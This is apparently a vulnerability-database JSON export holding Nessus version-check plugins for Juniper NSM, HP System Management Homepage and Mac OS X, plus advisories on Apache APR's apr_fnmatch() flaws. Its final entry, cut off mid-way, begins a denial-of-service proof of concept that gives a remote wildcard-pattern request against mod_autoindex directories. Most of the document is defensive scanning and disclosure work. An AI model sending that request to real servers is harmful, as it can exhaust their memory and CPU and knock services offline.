exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"global_settings.inc\");\n\nkb_base = \"Host/NSM/\";\n\n# No Solaris download available according to the Vendor's advisory\nos = get_kb_item(\"Host/OS\");\nif (report_paranoia < 2)\n{\n if (!isnull(os) && 'Solaris' >< os) audit(AUDIT_HOST_NOT, 'affected');\n}\n\nget_kb_item_or_exit(\"Juniper_NSM_VerDetected\");\n\nkb_list = make_list();\n\ntemp = get_kb_list(\"Juniper_NSM_GuiSvr/*/build\");\n\nif (!isnull(temp) && max_index(keys(temp)) > 0)\n kb_list = make_list(kb_list, keys(temp));\n\ntemp = get_kb_list(\"Host/NSM/*/build\");\nif (!isnull(temp) && max_index(keys(temp)) > 0)\n kb_list = make_list(kb_list, keys(temp));\n\nif (isnull(kb_list)) audit(AUDIT_NOT_INST, \"Juniper NSM Servers\");\n\nreport = '';\n\nentry = branch(kb_list);\n\nport = 0;\nkb_base = '';\n\nif (\"Juniper_NSM_GuiSvr\" >< entry)\n{\n port = entry - \"Juniper_NSM_GuiSvr/\" - \"/build\";\n kb_base = \"Juniper_NSM_GuiSvr/\" + port + \"/\";\n\n report_str1 = \"Remote GUI server version : \";\n report_str2 = \"Fixed version : \";\n}\nelse\n{\n kb_base = entry - \"build\";\n if (\"guiSvr\" >< kb_base)\n {\n report_str1 = \"Local GUI server version : \";\n report_str2 = \"Fixed version : \";\n }\n else\n {\n report_str1 = \"Local device server version : \";\n report_str2 = \"Fixed version : \";\n }\n}\n\nbuild = get_kb_item_or_exit(entry);\nversion = get_kb_item_or_exit(kb_base + 'version');\n\nversion_disp = version + \" (\" + build + \")\";\n\n# NSM 2012.2R9 or later\n# replace r or R with . for easier version comparison\n# in 2010 and 2011 versions they use S instead of R\nversion_num = ereg_replace(pattern:\"(r|R|s|S)\", replace:\".\", string:version);\n\n# remove trailing . if it exists\nversion_num = ereg_replace(pattern:\"\\.$\", replace:\"\", string:version_num);\n\nfix_disp = \"2012.2R9\";\nfix_num = \"2012.2.9\";\nif (ver_compare(ver:version_num, fix:fix_num, strict:FALSE) < 0)\n{\n if (report_verbosity > 0)\n {\n report = '\\n ' + report_str1 + version_disp +\n '\\n ' + report_str2 + fix_disp +\n '\\n';\n security_hole(extra:report, port:port);\n }\n else security_hole(port:port);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Juniper NSM\", version_disp);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:45", "description": "According to the web server's banner, the version of HP System Management Homepage (SMH) hosted on the remote host is earlier than 7.0. As such, it is reportedly affected by the following vulnerabilities :\n\n - An error exists in the 'generate-id' function in the bundled libxslt library that can allow disclosure of heap memory addresses. (CVE-2011-0195)\n\n - An unspecified input validation error exists and can allow cross-site request forgery attacks. (CVE-2011-3846)\n\n - Unspecified errors can allow attackers to carry out denial of service attacks via unspecified vectors.\n (CVE-2012-0135, CVE-2012-1993)\n\n - The bundled version of PHP contains multiple vulnerabilities. (CVE-2010-3436, CVE-2010-4409, CVE-2010-4645, CVE-2011-1148, CVE-2011-1153, CVE-2011-1464, CVE-2011-1467, CVE-2011-1468, CVE-2011-1470, CVE-2011-1471, CVE-2011-1938, CVE-2011-2202, CVE-2011-2483, CVE-2011-3182, CVE-2011-3189, CVE-2011-3267, CVE-2011-3268)\n\n - The bundled version of Apache contains multiple vulnerabilities. (CVE-2010-1452, CVE-2010-1623, CVE-2010-2068, CVE-2010-2791, CVE-2011-0419, CVE-2011-1928, CVE-2011-3192, CVE-2011-3348, CVE-2011-3368, CVE-2011-3639)\n\n - OpenSSL libraries are contained in several of the bundled components and contain multiple vulnerabilities.\n (CVE-2011-0014, CVE-2011-1468, CVE-2011-1945, CVE-2011-3207,CVE-2011-3210)\n\n - Curl libraries are contained in several of the bundled components and contain multiple vulnerabilities.\n (CVE-2009-0037, CVE-2010-0734, CVE-2011-2192)", "cvss3": {}, "published": "2012-04-20T00:00:00", "type": "nessus", "title": "HP System Management Homepage < 7.0 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0037", "CVE-2010-0734", "CVE-2010-1452", "CVE-2010-1623", "CVE-2010-2068", "CVE-2010-2791", "CVE-2010-3436", "CVE-2010-4409", "CVE-2010-4645", "CVE-2011-0014", "CVE-2011-0195", "CVE-2011-0419", "CVE-2011-1148", "CVE-2011-1153", "CVE-2011-1464", "CVE-2011-1467", "CVE-2011-1468", "CVE-2011-1470", "CVE-2011-1471", "CVE-2011-1928", "CVE-2011-1938", "CVE-2011-1945", "CVE-2011-2192", "CVE-2011-2202", "CVE-2011-2483", "CVE-2011-3182", "CVE-2011-3189", "CVE-2011-3192", "CVE-2011-3207", "CVE-2011-3210", "CVE-2011-3267", "CVE-2011-3268", "CVE-2011-3348", "CVE-2011-3368", "CVE-2011-3639", "CVE-2011-3846", "CVE-2012-0135", "CVE-2012-1993"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:hp:system_management_homepage"], "id": "HPSMH_7_0_0_24.NASL", "href": "https://www.tenable.com/plugins/nessus/58811", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58811);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2009-0037\",\n \"CVE-2010-0734\",\n \"CVE-2010-1452\",\n \"CVE-2010-1623\",\n \"CVE-2010-2068\",\n \"CVE-2010-2791\",\n \"CVE-2010-3436\",\n \"CVE-2010-4409\",\n \"CVE-2010-4645\",\n \"CVE-2011-0014\",\n \"CVE-2011-0195\",\n \"CVE-2011-0419\",\n \"CVE-2011-1148\",\n \"CVE-2011-1153\",\n \"CVE-2011-1464\",\n \"CVE-2011-1467\",\n \"CVE-2011-1468\",\n \"CVE-2011-1470\",\n \"CVE-2011-1471\",\n \"CVE-2011-1928\",\n \"CVE-2011-1938\",\n \"CVE-2011-1945\",\n \"CVE-2011-2192\",\n \"CVE-2011-2202\",\n \"CVE-2011-2483\",\n \"CVE-2011-3182\",\n \"CVE-2011-3189\",\n \"CVE-2011-3192\",\n \"CVE-2011-3207\",\n \"CVE-2011-3210\",\n \"CVE-2011-3267\",\n \"CVE-2011-3268\",\n \"CVE-2011-3348\",\n \"CVE-2011-3368\",\n \"CVE-2011-3639\",\n \"CVE-2011-3846\",\n \"CVE-2012-0135\",\n \"CVE-2012-1993\"\n );\n script_bugtraq_id(\n 33962,\n 38162,\n 40827,\n 41963,\n 42102,\n 43673,\n 44723,\n 45119,\n 45668,\n 46264,\n 46843,\n 46854,\n 46968,\n 46969,\n 46975,\n 46977,\n 47668,\n 47820,\n 47888,\n 47929,\n 47950,\n 48259,\n 48434,\n 49241,\n 49249,\n 49303,\n 49376,\n 49469,\n 49471,\n 49616,\n 49957,\n 52974,\n 53121\n );\n\n script_name(english:\"HP System Management Homepage < 7.0 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the web server's banner, the version of HP System\nManagement Homepage (SMH) hosted on the remote host is earlier than\n7.0. As such, it is reportedly affected by the following\nvulnerabilities :\n\n - An error exists in the 'generate-id' function in the\n bundled libxslt library that can allow disclosure of\n heap memory addresses. (CVE-2011-0195)\n\n - An unspecified input validation error exists and can\n allow cross-site request forgery attacks. (CVE-2011-3846)\n\n - Unspecified errors can allow attackers to carry out \n denial of service attacks via unspecified vectors.\n (CVE-2012-0135, CVE-2012-1993)\n\n - The bundled version of PHP contains multiple\n vulnerabilities. (CVE-2010-3436, CVE-2010-4409,\n CVE-2010-4645, CVE-2011-1148, CVE-2011-1153,\n CVE-2011-1464, CVE-2011-1467, CVE-2011-1468,\n CVE-2011-1470, CVE-2011-1471, CVE-2011-1938,\n CVE-2011-2202, CVE-2011-2483, CVE-2011-3182,\n CVE-2011-3189, CVE-2011-3267, CVE-2011-3268)\n\n - The bundled version of Apache contains multiple\n vulnerabilities. (CVE-2010-1452, CVE-2010-1623,\n CVE-2010-2068, CVE-2010-2791, CVE-2011-0419,\n CVE-2011-1928, CVE-2011-3192, CVE-2011-3348,\n CVE-2011-3368, CVE-2011-3639)\n\n - OpenSSL libraries are contained in several of the\n bundled components and contain multiple vulnerabilities.\n (CVE-2011-0014, CVE-2011-1468, CVE-2011-1945,\n CVE-2011-3207,CVE-2011-3210)\n\n - Curl libraries are contained in several of the bundled\n components and contain multiple vulnerabilities.\n (CVE-2009-0037, CVE-2010-0734, CVE-2011-2192)\");\n # http://web.archive.org/web/20130916143957/http://h20000.www2.hp.com:80/bizsupport/TechSupport/Document.jsp?objectID=c03280632\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?106ec533\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to HP System Management Homepage 7.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_cwe_id(352);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:system_management_homepage\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"compaq_wbem_detect.nasl\");\n script_require_keys(\"www/hp_smh\");\n script_require_ports(\"Services/www\", 2301, 2381);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n\nport = get_http_port(default:2381, embedded:TRUE);\ninstall = get_install_from_kb(appname:'hp_smh', port:port, exit_on_fail:TRUE);\ndir = install['dir'];\nversion = install['ver'];\nprod = get_kb_item_or_exit(\"www/\"+port+\"/hp_smh/variant\");\n\nif (version == UNKNOWN_VER) \n exit(1, 'The version of '+prod+' installed at '+build_url(port:port, qs:dir+\"/\")+' is unknown.');\n\n# nb: 'version' can have non-numeric characters in it so we'll create \n# an alternate form and make sure that's safe for use in 'ver_compare()'.\nversion_alt = ereg_replace(pattern:\"[_-]\", replace:\".\", string:version);\nif (!ereg(pattern:\"^[0-9][0-9.]+$\", string:version_alt))\n exit(1, 'The version of '+prod+' installed at '+build_url(port:port, qs:dir+\"/\")+' does not look valid ('+version+').');\n\nfixed_version = '7.0.0.24';\nif (ver_compare(ver:version_alt, fix:fixed_version, strict:FALSE) == -1)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n set_kb_item(name:'www/'+port+'/XSRF', value:TRUE);\n if (report_verbosity > 0)\n {\n source_line = get_kb_item(\"www/\"+port+\"/hp_smh/source\");\n\n report = '\\n Product : ' + prod;\n if (!isnull(source_line)) \n report += '\\n Version source : ' + source_line;\n report += \n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, prod, port, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:15:50", "description": "The remote host is running a version of Mac OS X 10.6 that does not have Security Update 2011-006 applied. This update contains numerous security-related fixes for the following components :\n\n - Apache\n - Application Firewall\n - ATS\n - BIND\n - Certificate Trust Policy\n - CFNetwork\n - CoreFoundation\n - CoreMedia\n - File Systems\n - IOGraphics\n - iChat Server\n - Mailman\n - MediaKit\n - PHP\n - postfix\n - python\n - QuickTime\n - Tomcat\n - User Documentation\n - Web Server\n - X11", "cvss3": {}, "published": "2011-10-13T00:00:00", "type": "nessus", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2011-006)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-4022", "CVE-2010-0097", "CVE-2010-1157", "CVE-2010-1634", "CVE-2010-2089", "CVE-2010-2227", "CVE-2010-3436", "CVE-2010-3613", "CVE-2010-3614", "CVE-2010-3718", "CVE-2010-4172", "CVE-2010-4645", "CVE-2011-0013", "CVE-2011-0185", "CVE-2011-0224", "CVE-2011-0229", "CVE-2011-0230", "CVE-2011-0231", "CVE-2011-0249", "CVE-2011-0250", "CVE-2011-0251", "CVE-2011-0252", "CVE-2011-0259", "CVE-2011-0411", "CVE-2011-0419", "CVE-2011-0420", "CVE-2011-0421", "CVE-2011-0534", "CVE-2011-0707", "CVE-2011-0708", "CVE-2011-1092", "CVE-2011-1153", "CVE-2011-1466", "CVE-2011-1467", "CVE-2011-1468", "CVE-2011-1469", "CVE-2011-1470", "CVE-2011-1471", "CVE-2011-1521", "CVE-2011-1755", "CVE-2011-1910", "CVE-2011-2464", "CVE-2011-2690", "CVE-2011-2691", "CVE-2011-2692", "CVE-2011-3192", "CVE-2011-3213", "CVE-2011-3214", "CVE-2011-3217", "CVE-2011-3218", "CVE-2011-3219", "CVE-2011-3220", "CVE-2011-3221", "CVE-2011-3222", "CVE-2011-3223", "CVE-2011-3224", "CVE-2011-3228"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2011-006.NASL", "href": "https://www.tenable.com/plugins/nessus/56481", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\nif (!defined_func(\"bn_random\")) exit(0);\nif (NASL_LEVEL < 3000) exit(0); # Avoid problems with large number of xrefs.\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(56481);\n script_version(\"1.27\");\n script_cvs_date(\"Date: 2018/07/14 1:59:35\");\n\n script_cve_id(\n \"CVE-2009-4022\",\n \"CVE-2010-0097\",\n \"CVE-2010-1157\",\n \"CVE-2010-1634\",\n \"CVE-2010-2089\",\n \"CVE-2010-2227\",\n \"CVE-2010-3436\",\n \"CVE-2010-3613\",\n \"CVE-2010-3614\",\n \"CVE-2010-3718\",\n \"CVE-2010-4172\",\n \"CVE-2010-4645\",\n \"CVE-2011-0013\",\n \"CVE-2011-0185\",\n \"CVE-2011-0224\",\n \"CVE-2011-0229\",\n \"CVE-2011-0230\",\n \"CVE-2011-0231\",\n \"CVE-2011-0249\",\n \"CVE-2011-0250\",\n \"CVE-2011-0251\",\n \"CVE-2011-0252\",\n \"CVE-2011-0259\",\n \"CVE-2011-0411\",\n \"CVE-2011-0419\",\n \"CVE-2011-0420\",\n \"CVE-2011-0421\",\n \"CVE-2011-0534\",\n \"CVE-2011-0707\",\n \"CVE-2011-0708\",\n \"CVE-2011-1092\",\n \"CVE-2011-1153\",\n \"CVE-2011-1466\",\n \"CVE-2011-1467\",\n \"CVE-2011-1468\",\n \"CVE-2011-1469\",\n \"CVE-2011-1470\",\n \"CVE-2011-1471\",\n \"CVE-2011-1521\",\n \"CVE-2011-1755\",\n \"CVE-2011-1910\",\n \"CVE-2011-2464\",\n \"CVE-2011-2690\",\n \"CVE-2011-2691\",\n \"CVE-2011-2692\",\n \"CVE-2011-3192\",\n \"CVE-2011-3213\",\n \"CVE-2011-3214\",\n \"CVE-2011-3217\",\n \"CVE-2011-3218\",\n \"CVE-2011-3219\",\n \"CVE-2011-3220\",\n \"CVE-2011-3221\",\n \"CVE-2011-3222\",\n \"CVE-2011-3223\",\n \"CVE-2011-3224\",\n \"CVE-2011-3228\"\n );\n script_bugtraq_id(\n 37118,\n 37865,\n 39635,\n 40370,\n 40863,\n 41544,\n 44723,\n 45015,\n 45133,\n 45137,\n 45668,\n 46164,\n 46174,\n 46177,\n 46354,\n 46365,\n 46429,\n 46464,\n 46767,\n 46786,\n 46854,\n 46967,\n 46968,\n 46969,\n 46970,\n 46975,\n 46977,\n 48007,\n 48250,\n 48566,\n 48618,\n 48660,\n 49303,\n 50085,\n 50091,\n 50092,\n 50095,\n 50098,\n 50100,\n 50101,\n 50111,\n 50116,\n 50117,\n 50122,\n 50127,\n 50130,\n 50131,\n 50150 \n );\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2011-006)\");\n script_summary(english:\"Check for the presence of Security Update 2011-006\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host is missing a Mac OS X update that fixes several\nsecurity issues.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is running a version of Mac OS X 10.6 that does not\nhave Security Update 2011-006 applied. This update contains numerous\nsecurity-related fixes for the following components :\n\n - Apache\n - Application Firewall\n - ATS\n - BIND\n - Certificate Trust Policy\n - CFNetwork\n - CoreFoundation\n - CoreMedia\n - File Systems\n - IOGraphics\n - iChat Server\n - Mailman\n - MediaKit\n - PHP\n - postfix\n - python\n - QuickTime\n - Tomcat\n - User Documentation\n - Web Server\n - X11\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-11-295/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-11-303/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-12-136/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/523931/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/HT5002\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.apple.com/archives/security-announce/2011/Oct/msg00003.html\");\n script_set_attribute(attribute:\"solution\", value:\"Install Security Update 2011-006 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/11/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) exit(0, \"The host does not appear to be running Mac OS X.\");\n\n\nif (ereg(pattern:\"Mac OS X 10\\.6([^0-9]|$)\", string:os)) \n{\n packages = get_kb_item_or_exit(\"Host/MacOSX/packages/boms\", exit_code:1);\n\n if (egrep(pattern:\"^com\\.apple\\.pkg\\.update\\.security\\.(2011\\.00[6-9]|201[2-9]\\.[0-9]+)(\\.snowleopard[0-9.]*)?\\.bom\", string:packages)) \n exit(0, \"The host has Security Update 2011-006 or later installed and therefore is not affected.\");\n else \n security_hole(0);\n}\nelse exit(0, \"The host is running \"+os+\" and therefore is not affected.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "veracode": [{"lastseen": "2023-04-18T12:48:58", "description": "apache apr is vulnerable to denial of service. It was found that the apr_fnmatch() function used an unconstrained recursion when processing patterns with the '*' wildcard. An attacker could use this flaw to cause an application using this function, which also accepted untrusted input as a pattern for matching (such as an httpd server using the mod_autoindex module), to exhaust all stack memory or use an excessive amount of CPU time when performing matching.\n", "cvss3": {}, "published": "2020-04-10T00:58:59", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419"], "modified": "2022-09-19T20:27:45", "id": "VERACODE:24600", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-24600/summary", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-04-18T12:49:03", "description": "apr is vulnerable to denial of service. The fix for CVE-2011-0419 (released via RHSA-2011:0507) introduced an infinite loop flaw in the apr_fnmatch() function when the APR_FNM_PATHNAME matching flag was used. A remote attacker could possibly use this flaw to cause a denial of service on an application using the apr_fnmatch() function.\n", "cvss3": {}, "published": "2020-04-10T01:02:57", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2023-02-13T07:23:07", "id": "VERACODE:24725", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-24725/summary", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "centos": [{"lastseen": "2023-06-01T15:39:40", "description": "**CentOS Errata and Security Advisory** CESA-2011:0507\n\n\nThe Apache Portable Runtime (APR) is a portability library used by the\nApache HTTP Server and other projects. It provides a free library of C data\nstructures and routines.\n\nIt was discovered that the apr_fnmatch() function used an unconstrained\nrecursion when processing patterns with the '*' wildcard. An attacker could\nuse this flaw to cause an application using this function, which also\naccepted untrusted input as a pattern for matching (such as an httpd server\nusing the mod_autoindex module), to exhaust all stack memory or use an\nexcessive amount of CPU time when performing matching. (CVE-2011-0419)\n\nRed Hat would like to thank Maksymilian Arciemowicz for reporting this\nissue.\n\nAll apr users should upgrade to these updated packages, which contain a\nbackported patch to correct this issue. Applications using the apr library,\nsuch as httpd, must be restarted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2011-May/067028.html\nhttps://lists.centos.org/pipermail/centos-announce/2011-May/067029.html\nhttps://lists.centos.org/pipermail/centos-announce/2011-May/067030.html\nhttps://lists.centos.org/pipermail/centos-announce/2011-May/067031.html\n\n**Affected packages:**\napr\napr-devel\napr-docs\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2011:0507", "cvss3": {}, "published": "2011-05-12T02:38:03", "type": "centos", "title": "apr security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419"], "modified": "2011-05-12T02:46:40", "id": "CESA-2011:0507", "href": "https://lists.centos.org/pipermail/centos-announce/2011-May/067028.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-01T15:39:36", "description": "**CentOS Errata and Security Advisory** CESA-2011:0844\n\n\nThe Apache Portable Runtime (APR) is a portability library used by the\nApache HTTP Server and other projects. It provides a free library of C data\nstructures and routines.\n\nThe fix for CVE-2011-0419 (released via RHSA-2011:0507) introduced an\ninfinite loop flaw in the apr_fnmatch() function when the APR_FNM_PATHNAME\nmatching flag was used. A remote attacker could possibly use this flaw to\ncause a denial of service on an application using the apr_fnmatch()\nfunction. (CVE-2011-1928)\n\nNote: This problem affected httpd configurations using the \"Location\"\ndirective with wildcard URLs. The denial of service could have been\ntriggered during normal operation; it did not specifically require a\nmalicious HTTP request.\n\nThis update also addresses additional problems introduced by the rewrite of\nthe apr_fnmatch() function, which was necessary to address the\nCVE-2011-0419 flaw.\n\nAll apr users should upgrade to these updated packages, which contain a\nbackported patch to correct this issue. Applications using the apr library,\nsuch as httpd, must be restarted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2011-June/067082.html\nhttps://lists.centos.org/pipermail/centos-announce/2011-June/067083.html\nhttps://lists.centos.org/pipermail/centos-announce/2011-May/067068.html\nhttps://lists.centos.org/pipermail/centos-announce/2011-May/067069.html\n\n**Affected packages:**\napr\napr-devel\napr-docs\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2011:0844", "cvss3": {}, "published": "2011-05-31T16:57:35", "type": "centos", "title": "apr security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2011-06-01T12:30:25", "id": "CESA-2011:0844", "href": "https://lists.centos.org/pipermail/centos-announce/2011-May/067068.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:03", "description": "\nApache 1.42.2.x - APR apr_fnmatch() Denial of Service", "cvss3": {}, "published": "2011-05-12T00:00:00", "type": "exploitpack", "title": "Apache 1.42.2.x - APR apr_fnmatch() Denial of Service", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419"], "modified": "2011-05-12T00:00:00", "id": "EXPLOITPACK:FDCB3D93694E48CD5EE27CE55D6801DE", "href": "", "sourceData": "source: https://www.securityfocus.com/bid/47820/info\n\nApache APR is prone to a vulnerability that may allow attackers to cause a denial-of-service condition.\n\nApache APR versions prior to 1.4.4 are vulnerable. \n\n<?php\n/*\nApache 2.2.17 mod_autoindex local/remote Denial of Service\nauthor: Maksymilian Arciemowicz\n\nCVE: CVE-2011-0419\nCWE: CWE-399\n\nREMOTE\nFind some directory with supported mod_autoindex on the server. The directory should contain long filenames.\n\nhttp://[server]/[directory_with_mod_autoindex]/?P=*?*?*?[to 4k]\n\nLOCAL\nTested on:\n127# httpd -v && uname -a \nServer version: Apache/2.2.17 (Unix)\nServer built: Dec 28 2010 13:21:44\nNetBSD localhost 5.1 NetBSD 5.1 (GENERIC) #0: Sun Nov 7 14:39:56 UTC 2010 builds@b6.netbsd.org:/home/builds/ab/netbsd-5-1-RELEASE/i386/201011061943Z-obj/home/builds/ab/netbsd-5-1-RELEASE/src/sys/arch/i386/compile/GENERIC i386\n\nResult:\n127# ls -la \ntotal 8\ndrwxrwxrwx 2 root wheel 512 Feb 8 21:41 .\ndrwxr-xr-x 7 www wheel 1024 Jan 31 08:49 ..\n-rw-r--r-- 1 www wheel 1056 Feb 8 19:39 .htaccess\n-rw-r--r-- 1 www wheel 0 Feb 8 19:39 cx.............................................................................................................................\n-rw-r--r-- 1 www wheel 1240 Feb 8 19:42 run.php\n127# ps 